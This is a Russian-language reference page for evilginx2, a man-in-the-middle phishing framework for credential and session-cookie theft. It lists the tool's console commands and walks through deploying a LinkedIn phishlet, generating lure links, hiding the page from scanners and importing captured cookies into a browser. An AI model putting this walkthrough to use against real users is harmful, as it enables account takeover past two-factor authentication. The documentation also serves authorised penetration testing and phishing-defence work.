evilginx2


Описание evilginx2

evilginx2 — это платформа для атаки человек-посередине для кражи учётных данных (логина и пароля) путём фишинга, умеет перехватывать кукиз сеанса, которые, в свою очередь, позволяют обойти защиту двухфакторной аутентификацией.

Этот инструмент является преемником Evilginx, выпущенного в 2017, который использует специально настроенную версию HTTP сервера nginx для обеспечения функциональности человек-посередине, чтобы действовать как прокси между браузером и фишинговым сайтом. Настоящая версия полностью написана на GO и является самостоятельным приложением, который реализуют свой собственный HTTP и DNS сервер, делая процесс установки и использования крайне простым.

Домашняя страница: https://github.com/kgretzky/evilginx2

Автор: Kuba Gretzky

Лицензия: GPLv3

Справка по evilginx2

Использование:

./evilginx

Опции:

  -debug
    	Включить вывод отладочной информации
  -developer
    	Включить режим разработчика (генерирует самоподписанные сертификаты для всех имён хостов)
  -p строка
    	Путь до директории с фишлетами

На самом деле управление программой выполняется в интерактивной консоли.

Руководство по evilginx2

Страница man отсутствует.

Следующие команды используются в интерактивной консоли программы:


    config : управление основной конфигурацией
 phishlets : управление конфигурацией фишлетов
  sessions : управление сессиями и захваченными токенами (маркерами) с учётными данными
     lures : управление приманками для генерации фишинговых url
     clear : очистка экрана

config

Показывает значения всех переменных конфигурации и позволяет из изменять.

                           config : показывает все переменные конфигурации
            config domain <домен> : установить базовый домен для всех фишлетов (например, evilsite.com)
             config ip <ip_адрес> : устанавливает IP адрес ткущего сервера
        config redirect_key <имя> : меняет имя параметра перенаправления в фишинговом url (фишинговые url нужно будет пересоздать)
     config verification_key <имя> : изменяет имя параметра верификации в фишинговом url (фишинговые url нужно будет пересоздать)
 config verification_token <токен> : меняет значение маркера верификации (фишинговые url нужно будет пересоздать)
        config redirect_url <url> : изменить url куда будут перенаправляться все неавторизованные запросы (фишинговые url нужно будет пересоздать)

phishlets

Показывает статус всех доступных фишлетов и позволяет изменить их параметры и включить их.

                                 phishlets : показать статус всех доступных фишлетов
   phishlets hostname <фишлет> <имя_хоста> : установить имя хоста для данного шифлета (например, this.is.not.a.phishing.site.evilsite.com)
                 phishlets enable <фишлет> : включить фишлет и если нужно запросить ssl/tls сертификат
                phishlets disable <фишлет> : отключить фишлет
                   phishlets hide <фишлет> : спрятать фишинговую страницу, вести журнал и перенаправлять все запросы, пришедшие к ней (полезно для избежания сканеров во время рассылки фишинговых ссылок)
                 phishlets unhide <фишлет> : делает фишинговую страницу доступный из вне
 phishlets get-url <фишлет> <url_для_перенаправления> : генерирует фишинговый url с перенаправлением при успешной аутентификации
              phishlets get-hosts <фишлет> : делает в файл hosts записи, для использования в тестировании localhost

sessions

Показывает все захваченные учётные данные и токены аутентификации. Позволяет просматривать полную историю визитов и удалять сессии входа.

             sessions : показывает историю всех записанных визитов и захваченных учётных данных
        sessions <id> : показывает подробности по сессии, включая захваченные токены аутентификации, если они есть
 sessions delete <id> : удаляет сессию входа имеющую <id> (разрешены диапазоны через разделитель 1-7,10-12,15-25)
  sessions delete all : удалить все сессии входа

lures

Показывает все созданные приманки и позволяет редактировать или удалять их.

                                       lures : показывает все созданные применки
                                  lures <id> : показывает подробности по приманке с заданным <id>
                       lures create <фишлет> : creates new lure for given <фишлет>
                           lures delete <id> : удаляет приманку с заданным <id>
                            lures delete all : удаляет все созданные приманки
                 lures edit path <id> <путь> : устанавливает пользовательский url <путь> для приманки с заданным <id>
 lures edit redirect_url <id> <url_редиректа> : устанавливает url редиректа, куда пользователь будет перенаправлен при успешной авторизации для приманки с заданным <id>
         lures edit phishlet <id> <фишлет> : изменить фишлет, применяется к приманке с заданным <id>
                 lures edit info <id> <информация> : установить определённое описание для приманки с заданным <id> (только для напоминания)
            lures edit og_title <id> <заголовок> : установить заголовок opengraph, который будет показан по превью ссылки для приманки с заданным <id>
             lures edit og_desc <id> <заголовок> : установить описание opengraph которое будет показано по превью ссылки для приманки с заданным <id>
            lures edit og_image <id> <заголовок> : установить url изображения opengraph которое будет показано по превью ссылки для приманки с заданным <id>
              lures edit og_url <id> <заголовок> : установить url для opengraph которая будет показана по превью ссылки для приманки с заданным <id>
          lures edit params <id> <ключ=значение> : добавить, отредактировать или удалить пользовательские параметры (используется при внедрении javascript) для приманки с заданным <id>

Примеры запуска evilginx2

Чтобы всё заработало как надо, вам нужно сделать предварительную настройку.


На этом этапе подразумевается, что вы зарегистрировали доменное имя (допустим это yourdomain.com) и настроили Сервера Имён (nameservers, NS), оба ns1 и ns2 в панели управления вашего хостинг провайдера (или провайдера услуг по регистрации доменов) чтобы сервера имён указывали на IP адрес вашего сервера (допустим, это 10.0.0.1):

ns1.yourdomain.com = 10.0.0.1
ns2.yourdomain.com = 10.0.0.1

Далее уже в evilginx2 установить ваш домен и IP сервера следующими командами:

config domain yourdomain.com
config ip 10.0.0.1

Теперь можно выбрать фишлет, который вы хотите использовать. Для этого короткого руководства мы будем использовать фишлет LinkedIn. Установим имя хоста для данного фишлета (очевидно, что он должен содержать ваш домен):

phishlets hostname linkedin my.phishing.hostname.yourdomain.com

И теперь вы можете включить фишлет, который инициирует автоматическое получение сертификатов SSL/TLS если они не найдены локально для имени хоста, которое вы выбрали:

phishlets enable linkedin

Теперь ваш фишинговый сайт онлайн. Подумайте об URL, куда должна быть перенаправлена жертва в случае успешного входа и установите его так (жертва будет перенаправлена на https://www.google.com):

phishlets get-url linkedin https://www.google.com

Запущенные фишлеты будут отвечать только на ссылки с токенами, это сделана для того, чтобы сканеры, веб обходчики и боты не видели вашу фишинговую страницу, вместо этого они будут перенаправлены на адрес, установленный в redirect_url. Если вы хотите спрятать ваш фишлет и сделать так, чтобы он не отвечал даже на запрос URL с правильным токеном, то используйте команду hide/unhide <phishlet>.

Вы можете мониторить захваченные учётные данные и кукиз сессии командой:

sessions

Для получения детальной информации о захваченной сессии, с самими сессионными куки, используйте команду с указанием идентификатора сессии (куки будут напечатаны внизу в формате JSON):

sessions <id>

Захваченные кукиз могут быть скопированы и импортированы в браузер Chrome используя расширение EditThisCookie.

Важно: если вы хотите, чтобы evilginx2 продолжал работать и после того, как вы вышли с вашего сервера, то эту программу нужно запускать внутри сессии screen.

Установка evilginx2

Установка в Kali Linux

Установка из скомпилированных файлов (более простая, но может быть установлена не самая последняя версия):

wget -O evilginx_linux.zip https://github.com`curl -s https://github.com/kgretzky/evilginx2/releases | grep -E -o '/kgretzky/evilginx2/releases/download/[0-9.]+/evilginx_linux[0-9a-z._]+zip' | head -n 1`
unzip evilginx_linux.zip -d evilginx
rm evilginx_linux.zip
cd evilginx/
chmod 700 ./evilginx
sudo ./evilginx

Установка из исходного кода (будет установлена самая последняя версия):

Перейдите на страницу «Установка Go (компилятора и инструментов) в Linux» и следуйте инструкциям из раздела «Ручная установка самой последней версии компилятора Go».

Затем выполните следующие команды:

sudo apt install git make
go get -u github.com/kgretzky/evilginx2
cd $GOPATH/src/github.com/kgretzky/evilginx2
make
sudo make install

Запуск:

sudo evilginx

Установка в BlackArch

Установка из скомпилированных файлов (более простая, но может быть установлена не самая последняя версия):

wget -O evilginx_linux.zip https://github.com`curl -s https://github.com/kgretzky/evilginx2/releases | grep -E -o '/kgretzky/evilginx2/releases/download/[0-9.]+/evilginx_linux[0-9a-z._]+zip' | head -n 1`
unzip evilginx_linux.zip -d evilginx
rm evilginx_linux.zip
cd evilginx/
chmod 700 ./evilginx
sudo ./evilginx

Установка из исходного кода (будет установлена самая последняя версия):

Перейдите на страницу «Установка Go (компилятора и инструментов) в Linux» и следуйте инструкциям из раздела «Ручная установка самой последней версии компилятора Go».

Затем выполните следующие команды:

sudo pacman -S git make
go get -u github.com/kgretzky/evilginx2
cd $GOPATH/src/github.com/kgretzky/evilginx2
make
sudo make install

Запуск:


sudo evilginx

Информация об установке в другие операционные системы будет добавлена позже.

Скриншоты evilginx2

Инструкции по evilginx2


Близкие программы:

  • Evilginx (100%)
  • seeker (75.1%)
  • Router Scan by Stas'M (61%)
  • RouterSploit (61%)
  • mXtract (61%)
  • Orc (RANDOM - 7.6%)
  • Рекомендуется Вам:

    Comments are Closed